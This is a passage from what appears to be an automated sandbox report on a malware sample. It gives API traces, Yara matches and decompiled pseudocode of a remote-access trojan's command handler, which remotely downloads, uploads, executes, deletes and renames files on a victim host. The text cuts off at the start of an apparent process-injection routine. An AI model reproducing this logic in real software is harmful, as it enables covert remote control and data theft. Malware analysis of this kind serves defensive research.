                    • _free.LIBCMT ref: 004483C0
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 1c4e2f15c0be4fd7432d5764b9d18203d050bdf7f8d2042484f8342e9df57e93
                    • Instruction ID: 60c65a57f4404dc7eec93e126a54dda1ba11399514c1d014c30e87a140478a45
                    • Opcode Fuzzy Hash: 1c4e2f15c0be4fd7432d5764b9d18203d050bdf7f8d2042484f8342e9df57e93
                    • Instruction Fuzzy Hash: 8C01D6722003456BF3218E6A984195EFBE9EB85374F25052EE98493280EB35A905C768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C
                    • WSAGetLastError.WS2_32 ref: 0042219B
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID:
                    • API String ID: 2514157807-0
                    • Opcode ID: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                    • Instruction ID: 5fd3ebf0e0d9901e6086a92a38d31c1d4f4930f82062b2ddb0320275891adbe9
                    • Opcode Fuzzy Hash: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                    • Instruction Fuzzy Hash: B7F0A43230C1297A9F189959FE94C7933459F85374BB0436BFE3AC65F0EA6998602149
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
                    • Instruction ID: 680b6e8bc4c2fa124abf68bcdd5a812fa191381f72dfdd1accecd8568f1e318d
                    • Opcode Fuzzy Hash: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
                    • Instruction Fuzzy Hash: 8AF0E931A00321AADF216A639C45B5B3788AF4D7B1F15A037FC04DB690DA3CDC5986ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275
                    • WSAGetLastError.WS2_32 ref: 0042220C
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID:
                    • API String ID: 1802528911-0
                    • Opcode ID: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                    • Instruction ID: 207b8048d6da47c8d3e1bf0cf2b23625c58979fe3f9e08f58dd8cb8bfe01de6d
                    • Opcode Fuzzy Hash: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                    • Instruction Fuzzy Hash: 19F0BB3530C534FADF18995CFE548393341AF45330B70439BF939866F0DA6E5850917A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 213c8ad60bcf00827f18147b081050361add05c8605f2d1588902cc22186a757
                    • Instruction ID: 91fcd9f2d65c70f63789f855a9a09aa89de8be21b0d3159f81b9c9a6f631e38b
                    • Opcode Fuzzy Hash: 213c8ad60bcf00827f18147b081050361add05c8605f2d1588902cc22186a757
                    • Instruction Fuzzy Hash: 0BF05922B00324ABDB10D6B5D9027CBB7ECEF44318F40046ED904C3041E729E704C765
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                    • Instruction ID: 400f104e77b540acbfcd3781324d28ce3e91d9a3d9d75f8370708e8767061156
                    • Opcode Fuzzy Hash: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                    • Instruction Fuzzy Hash: 01E02BB290022177DB2126625C0075B36489F5D7B1F103037FD05922C0DB6CCC0582EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • socket.WS2_32(00000000,00000001,00000006), ref: 004049AC
                      • Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Startupsocket
                    • String ID:
                    • API String ID: 3996037109-0
                    • Opcode ID: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                    • Instruction ID: 643c1d6dd67993fbe743bd4810411797e70fdf622d87f5941d6678f6439cf7cf
                    • Opcode Fuzzy Hash: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                    • Instruction Fuzzy Hash: 68F0BEF10057905AE7314F344880393BFD45B52318F14897FE6D2A3BC2C2B9A819C76A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlExitUserThread.NTDLL(00000000), ref: 00910023
                    Memory Dump Source
                    • Source File: 00000007.00000002.923900889.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                    Similarity
                    • API ID: ExitThreadUser
                    • String ID:
                    • API String ID: 3424019298-0
                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlExitUserThread.NTDLL(00000000), ref: 00990023
                    Memory Dump Source
                    • Source File: 00000007.00000002.924014470.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: false
                    Similarity
                    • API ID: ExitThreadUser
                    • String ID:
                    • API String ID: 3424019298-0
                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • recv.WS2_32(FFFFFFFF,0046BACC,?,00000000), ref: 00404B82
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: f51da9c7f7a354ed60f7591d544108ff1c1d334abc874874dee1a6f4a1b8aa5d
                    • Instruction ID: f3ec6d8f34401422f244b447c80db10cf3c514e603278a65c5bd388ab48e0435
                    • Opcode Fuzzy Hash: f51da9c7f7a354ed60f7591d544108ff1c1d334abc874874dee1a6f4a1b8aa5d
                    • Instruction Fuzzy Hash: 2DE08672048204BFDB056F40DC46FA97F29DB54765F24C11EFA08191A2DB33F552D748
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                    • Instruction ID: 820ae791bcbb1d2b57b63688d1298c64991293a60e6d01c8c57279511ad2648c
                    • Opcode Fuzzy Hash: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                    • Instruction Fuzzy Hash: 59D0123255861C4ED611AAB4AD0F8A5B76CC313A12F4003BAACB5C25D3F650572CC2FB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                    • Instruction ID: fff77dfbf1f0459fa3aaeb9656e953647c3761fb795b74ea4a0806b79efbc88b
                    • Opcode Fuzzy Hash: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                    • Instruction Fuzzy Hash: 70C04C79104608BB9B061FA19D08C793B69D7456617008025B90556151D576DA5096B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923924867.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                    • Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
                    • Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                    • Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 81%
                    			E0040697D(short* __edx, void* __eflags, intOrPtr _a4) {
                    				char _v108;
                    				void* _v112;
                    				char _v132;
                    				char _v136;
                    				char _v140;
                    				char _v152;
                    				char _v156;
                    				char _v160;
                    				void* _v176;
                    				char _v180;
                    				char _v192;
                    				void* _v204;
                    				char _v208;
                    				char _v212;
                    				char _v216;
                    				void* _v224;
                    				char _v228;
                    				char _v232;
                    				char _v236;
                    				char _v240;
                    				char _v244;
                    				void* _v248;
                    				char _v252;
                    				char _v256;
                    				char _v260;
                    				char _v264;
                    				char _v268;
                    				char _v272;
                    				char _v276;
                    				char _v280;
                    				char _v284;
                    				char _v288;
                    				char _v292;
                    				char _v296;
                    				void* _v300;
                    				void* _v308;
                    				void* _v312;
                    				char _v324;
                    				char _v336;
                    				char _v344;
                    				char _v348;
                    				char _v368;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed char _t160;
                    				signed int _t162;
                    				void* _t166;
                    				void* _t171;
                    				signed int _t172;
                    				void* _t187;
                    				void* _t202;
                    				signed int _t204;
                    				void* _t218;
                    				int _t228;
                    				void* _t235;
                    				void* _t236;
                    				void* _t249;
                    				void* _t256;
                    				signed int _t261;
                    				void* _t265;
                    				void* _t277;
                    				short* _t288;
                    				void* _t289;
                    				void* _t300;
                    				void* _t316;
                    				void* _t326;
                    				void* _t332;
                    				void* _t334;
                    				void* _t336;
                    				void* _t340;
                    				void* _t344;
                    				void* _t354;
                    				void* _t356;
                    				void* _t377;
                    				void* _t380;
                    				void* _t542;
                    				void* _t569;
                    				intOrPtr _t574;
                    				intOrPtr _t575;
                    				signed int _t576;
                    				signed int _t578;
                    				signed int _t581;
                    				void* _t588;
                    				void* _t590;
                    				void* _t592;
                    				void* _t594;
                    				void* _t596;
                    				signed int _t597;
                    				void* _t600;
                    				void* _t601;
                    				void* _t602;
                    				void* _t603;
                    				void* _t604;
                    				void* _t605;
                    				void* _t606;
                    				void* _t609;
                    				void* _t614;
                    				void* _t615;
                    				void* _t616;
                    				void* _t618;
                    				void* _t620;
                    				void* _t639;
                    				void* _t640;
                    				void* _t641;
                    				void* _t642;
                    				void* _t645;
                    				void* _t647;
                    
                    				_t646 = __eflags;
                    				_t550 = __edx;
                    				_push(_t356);
                    				_t574 = _a4;
                    				_push(_t569);
                    				E004020EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
                    				SetEvent( *(_t574 + 0x34));
                    				_t575 =  *((intOrPtr*)(E00401F95( &_v160)));
                    				E004042A6( &_v160,  &_v136, 4, 0xffffffff);
                    				_t600 = (_t597 & 0xfffffff8) - 0xec;
                    				E004020EC(0x46c238, _t600, _t550, _t646, 0x46c238);
                    				_t601 = _t600 - 0x18;
                    				E004020EC(0x46c238, _t601, _t550, _t646,  &_v152);
                    				E00417478( &_v288, _t550);
                    				_t602 = _t601 + 0x30;
                    				_t647 = _t575 - 0x8b;
                    				if(_t647 > 0) {
                    					_t576 = _t575 - 0x8c;
                    					__eflags = _t576;
                    					if(__eflags == 0) {
                    						E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
                    						_t160 = GetFileAttributesW(E00401EEB( &_v260));
                    						__eflags = _t160 & 0x00000010;
                    						if((_t160 & 0x00000010) == 0) {
                    							_t162 = DeleteFileW(E00401EEB( &_v260));
                    						} else {
                    							_t162 = E00417754(E00401EEB( &_v260));
                    						}
                    						__eflags = _t162;
                    						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
                    						if(__eflags == 0) {
                    							_t603 = _t602 - 0x18;
                    							E0041739C(0x46c238, _t603,  &_v252);
                    							_push(0x55);
                    							E00404AA4(0x46c238, 0x46c2e8,  &_v252, __eflags);
                    							_t166 = E0041733B( &_v208,  &_v280);
                    							_t604 = _t603 - 0x18;
                    							_t553 = "Unable to delete: ";
                    							E004075C2(0x46c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
                    							_t605 = _t604 - 0x14;
                    							_t377 = _t605;
                    							_push("[ERROR]");
                    						} else {
                    							_t187 = E0041733B( &_v180,  &_v252);
                    							_t609 = _t602 - 0x18;
                    							_t553 = "Deleted file: ";
                    							E004075C2(0x46c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
                    							_t605 = _t609 - 0x14;
                    							_t377 = _t605;
                    							_push("[Info]");
                    						}
                    						E00402084(0x46c238, _t377);
                    						E00416C80(0x46c238, _t569);
                    						_t606 = _t605 + 0x30;
                    						E00401FC7();
                    						_t171 = E00401E49( &_v288, _t553, __eflags, 1);
                    						_t550 = "1";
                    						_t380 = _t171;
                    						_t172 = E00405A6F("1");
                    						__eflags = _t172;
                    						if(_t172 == 0) {
                    							L40:
                    							E00401EF0();
                    							L41:
                    							E00401E74( &_v284, _t550);
                    							E00401FC7();
                    							E00401FC7();
                    							return 0;
                    						} else {
                    							__eflags = E00407323( &_v272, _t380, _t380) + 1;
                    							E0040733F(E00407323( &_v272, _t380, _t380) + 1);
                    							_t550 =  &_v284;
                    							E00401EFA( &_v284,  &_v284, _t576, E00402FFA(0x46c238,  &_v212,  &_v284, 0x2a));
                    							E00401EF0();
                    							E0040427F(0x46c238, _t606 - 0x18, E00401EEB( &_v288));
                    							L39:
                    							E004061C3();
                    							goto L40;
                    						}
                    					}
                    					_t578 = _t576 - 1;
                    					__eflags = _t578;
                    					if(__eflags == 0) {
                    						E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
                    						E0040427F(0x46c238,  &_v216, E00401F95(E00401E49( &_v272, _t550, __eflags, 1)));
                    						E00407309( &_v276,  &_v252, 0, E00407323( &_v268,  &_v216,  &_v216) + 1);
                    						_t202 = E00401EEB(E00407629( &_v216,  &_v264,  &_v240));
                    						_t204 = E00439924(E00401EEB( &_v288), _t202);
                    						asm("sbb bl, bl");
                    						E00401EF0();
                    						_t361 =  ~_t204 + 1;
                    						__eflags =  ~_t204 + 1;
                    						if(__eflags == 0) {
                    							_t550 = E004075E6( &_v180, "Unable to rename file!", __eflags, 0x46c238);
                    							E00405343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
                    							_push(0x59);
                    							E00404AA4(_t361, 0x46c2e8, _t206, __eflags);
                    							E00401FC7();
                    						} else {
                    							_t550 =  &_v228;
                    							E00407514(_t602 - 0x18,  &_v228, __eflags, "*");
                    							E004061C3();
                    						}
                    						E00401EF0();
                    						L13:
                    						E00401EF0();
                    						goto L40;
                    					}
                    					_t581 = _t578 - 1;
                    					__eflags = _t581;
                    					if(__eflags == 0) {
                    						E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
                    						_t218 = E00401F95(E00401E49( &_v272, _t550, __eflags, 1));
                    						_t550 =  &_v264;
                    						CreateDirectoryW(E00401EEB(E00407514( &_v192,  &_v264, __eflags, _t218)), 0);
                    						E00401EF0();
                    						E00403300(0x2a);
                    						E00407350(0x46c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
                    						goto L39;
                    					}
                    					_t583 = _t581 - 3;
                    					__eflags = _t581 - 3;
                    					if(__eflags == 0) {
                    						_t228 = StrToIntA(E00401F95(E00401E49( &_v264, _t550, __eflags, _t583)));
                    						_t550 = E00401F95(E00401E49( &_v268, _t550, __eflags, 1));
                    						E00417F10(_t228, _t230);
                    					}
                    					goto L41;
                    				}
                    				if(_t647 == 0) {
                    					E004020D5(0x46c238,  &_v180);
                    					E0040484E(0x46c238,  &_v108, 1);
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					E00404A08(_t550);
                    					_t235 = E00401E49( &_v284, _t550, __eflags, 3);
                    					_t614 = _t602 - 0xfffffffffffffff8;
                    					_t236 = E00401E49( &_v288, _t550, __eflags, 2);
                    					E00402F93(0x46c238, _t614, E00402F93(0x46c238,  &_v236, E00402F93(0x46c238,  &_v260, E00402FB7( &_v284, E00401E49( &_v292, _t550, __eflags, 1), 0x46c238), __eflags, _t236), __eflags, 0x46c238), __eflags, _t235);
                    					E00404AA4(0x46c238,  &_v140, _t240, __eflags);
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    					E0040427F(0x46c238,  &_v292, E00401F95(E00401E49( &_v324, _t240, __eflags, 0)));
                    					_t249 = E0041733B( &_v272,  &_v296);
                    					_t615 = _t614 - 0x18;
                    					E004075C2(0x46c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
                    					_t616 = _t615 - 0x14;
                    					E00402084(0x46c238, _t616, "[Info]");
                    					E00416C80(0x46c238, "[Info]");
                    					E00401FC7();
                    					E00401EF0();
                    					_t256 = E00401F95(E00401E49( &_v336, "Downloading file: ", __eflags, 0));
                    					_t618 = _t616 + 0x30 - 0x18;
                    					E0040427F(0x46c238, _t618, _t256);
                    					_t261 = E004062D8( &_v192, __eflags, E004398A0(_t258, E00401F95(E00401E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
                    					_t620 = _t618 + 0x2c;
                    					_push(0);
                    					__eflags = _t261;
                    					if(__eflags == 0) {
                    						E0040427F(0x46c238,  &_v264, E00401F95(E00401E49( &_v348, "Downloading file: ", __eflags)));
                    						_t265 = E0041733B( &_v244,  &_v268);
                    						_t550 = "Failed to download file: ";
                    						E004075C2(0x46c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
                    						E00402084(0x46c238, _t620 - 4, "[ERROR]");
                    						E00416C80(0x46c238, "[Info]");
                    						E00401FC7();
                    						E00401EF0();
                    					} else {
                    						E0040427F(0x46c238,  &_v264, E00401F95(E00401E49( &_v348, "Downloading file: ", __eflags)));
                    						_t277 = E0041733B( &_v244,  &_v268);
                    						_t550 = "Downloaded file: ";
                    						E004075C2(0x46c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
                    						E00402084(0x46c238, _t620 - 4, "[Info]");
                    						E00416C80(0x46c238, "[Info]");
                    						E00401FC7();
                    						E00401EF0();
                    						E00402084(0x46c238, _t620 - 4 + 0x30 - 0x18, 0x45f6bc);
                    						_push(0x58);
                    						E00404AA4(0x46c238,  &_v156, "Downloaded file: ", __eflags);
                    					}
                    					E00404E0B( &_v140);
                    					E00404E2F(0x46c238,  &_v140, 0);
                    					L15:
                    					E00401FC7();
                    					goto L41;
                    				}
                    				_t588 = _t575 - 0x61;
                    				if(_t588 == 0) {
                    					E0040427F(0x46c238, _t602 - 0x18, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
                    					_t288 = E00401E49( &_v272, _t550, __eflags, 2);
                    					_t289 = E00401E49( &_v276, _t550, __eflags, 1);
                    					_t550 = _t288;
                    					E004169CC(_t289, _t288);
                    					goto L41;
                    				}
                    				_t590 = _t588 - 0x26;
                    				if(_t590 == 0) {
                    					GetLogicalDriveStringsA(0x64,  &_v108);
                    					E004020AB(0x46c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
                    					__eflags = E00407397( &_v260, 0x45f860, 0, 2) + 1;
                    					E00401F84(E00407397( &_v260, 0x45f860, 0, 2) + 1);
                    					E004020EC(0x46c238, _t602 - 0x18, _t550, E00407397( &_v260, 0x45f860, 0, 2) + 1,  &_v276);
                    					_t300 = E00406406(0x46c238,  &_v256);
                    					_t550 = E00402FB7( &_v232,  &_v280, 0x46c238);
                    					E00402F1D(_t602 - 0x18, _t301, _t300);
                    					_push(0x51);
                    					E00404AA4(0x46c238, 0x46c2e8, _t301, __eflags);
                    					E00401FC7();
                    					E00401FC7();
                    					goto L15;
                    				}
                    				_t592 = _t590 - 1;
                    				if(_t592 == 0) {
                    					E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
                    					E00407350(0x46c238, _t602 - 0x18, _t550, __eflags,  &_v260);
                    					E004061C3();
                    					__eflags = E00402489() - 2;
                    					_t316 = E0041733B( &_v228, E00407309( &_v264,  &_v240, 0, E00402489() - 2));
                    					_t550 = "Browsing directory: ";
                    					E004075C2(0x46c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E00402489() - 2, _t316);
                    					E00402084(0x46c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
                    					E00416C80(0x46c238, _t569);
                    					E00401FC7();
                    					goto L13;
                    				}
                    				_t594 = _t592 - 1;
                    				if(_t594 == 0) {
                    					E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
                    					ShellExecuteW(0, L"open", E00401EEB( &_v260), 0, 0, 1);
                    					_t326 = E0041733B( &_v212,  &_v260);
                    					_t550 = "Executing file: ";
                    					E004075C2(0x46c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
                    					E00402084(0x46c238, _t602 - 4, "[Info]");
                    					E00416C80(0x46c238, _t569);
                    					E00401FC7();
                    					goto L40;
                    				} else {
                    					_t596 = _t594 - 1;
                    					_t652 = _t596;
                    					if(_t596 == 0) {
                    						E004072F6( &_v108);
                    						_t332 = E00401E49( &_v264, _t550, _t652, 3);
                    						_t639 = _t602 - 0x18;
                    						E004020EC(0x46c238, _t639, _t550, _t652, _t332);
                    						_t334 = E00401E49( &_v272, _t550, _t652, 2);
                    						_t640 = _t639 - 0x18;
                    						E004020EC(0x46c238, _t640, _t550, _t652, _t334);
                    						_t336 = E00401E49( &_v280, _t550, _t652, 1);
                    						_t641 = _t640 - 0x18;
                    						E004020EC(0x46c238, _t641, _t550, _t652, _t336);
                    						_push(E00401F95(E00401E49( &_v288, _t550, _t652, _t596)));
                    						_t340 = E004064A2( &_v136, _t550);
                    						_push(_t596);
                    						_t653 = _t340;
                    						if(_t340 == 0) {
                    							E0040427F(0x46c238,  &_v252, E00401F95(E00401E49( &_v368, _t550, __eflags)));
                    							_t344 = E0041733B( &_v232,  &_v256);
                    							_t642 = _t641 - 0x18;
                    							_t550 = "Failed to upload file: ";
                    							E004075C2(0x46c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
                    							_t542 = _t642 - 0x14;
                    							_push("[ERROR]");
                    						} else {
                    							E0040427F(0x46c238,  &_v252, E00401F95(E00401E49( &_v368, _t550, _t653)));
                    							_t354 = E0041733B( &_v232,  &_v256);
                    							_t645 = _t641 - 0x18;
                    							_t550 = "Uploaded file: ";
                    							E004075C2(0x46c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
                    							_t542 = _t645 - 0x14;
                    							_push("[Info]");
                    						}
                    						E00402084(0x46c238, _t542);
                    						E00416C80(0x46c238, _t569);
                    						E00401FC7();
                    						E00401EF0();
                    						L00407304(0x46c238,  &_v132, _t596);
                    					}
                    					goto L41;
                    				}
                    			}

                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 0040699F
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B88
                      • Part of subcall function 004064A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                      • Part of subcall function 004062D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
                      • Part of subcall function 004062D8: WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
                      • Part of subcall function 004062D8: CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
                      • Part of subcall function 004062D8: MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                    • GetLogicalDriveStringsA.KERNEL32 ref: 00406C73
                    • StrToIntA.SHLWAPI(00000000,?), ref: 00406FE2
                    • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407051
                      • Part of subcall function 004061C3: FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
                    • API String ID: 4189642951-1986272625
                    • Opcode ID: a01002e2a7040f8e56e615568d966f15b4a24b71adf8afd063430daddc13f2bd
                    • Instruction ID: 2a12d23acd30ce868743ee3b5d09fdf4f29f8ef519bcce84dbcc6bced154e8ad
                    • Opcode Fuzzy Hash: a01002e2a7040f8e56e615568d966f15b4a24b71adf8afd063430daddc13f2bd
                    • Instruction Fuzzy Hash: BD3292716183015BC608F776C8569AF77A9AF91348F40093FF942671E3EF389A09C69B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0041412B(WCHAR* __ecx, char __edx, struct _PROCESS_INFORMATION* _a4) {
                    				void _v8;
                    				signed int _v12;
                    				char _v16;
                    				CONTEXT* _v20;
                    				WCHAR* _v24;
                    				struct _STARTUPINFOW _v92;
                    				void* __edi;
                    				void* _t58;
                    				void* _t72;
                    				void* _t73;
                    				int _t83;
                    				intOrPtr* _t95;
                    				void* _t98;
                    				signed int _t102;
                    				intOrPtr _t104;
                    				void* _t106;
                    				CONTEXT* _t110;
                    				void* _t113;
                    				CONTEXT* _t114;
                    				struct _PROCESS_INFORMATION* _t116;
                    
                    				_v8 = _v8 & 0x00000000;
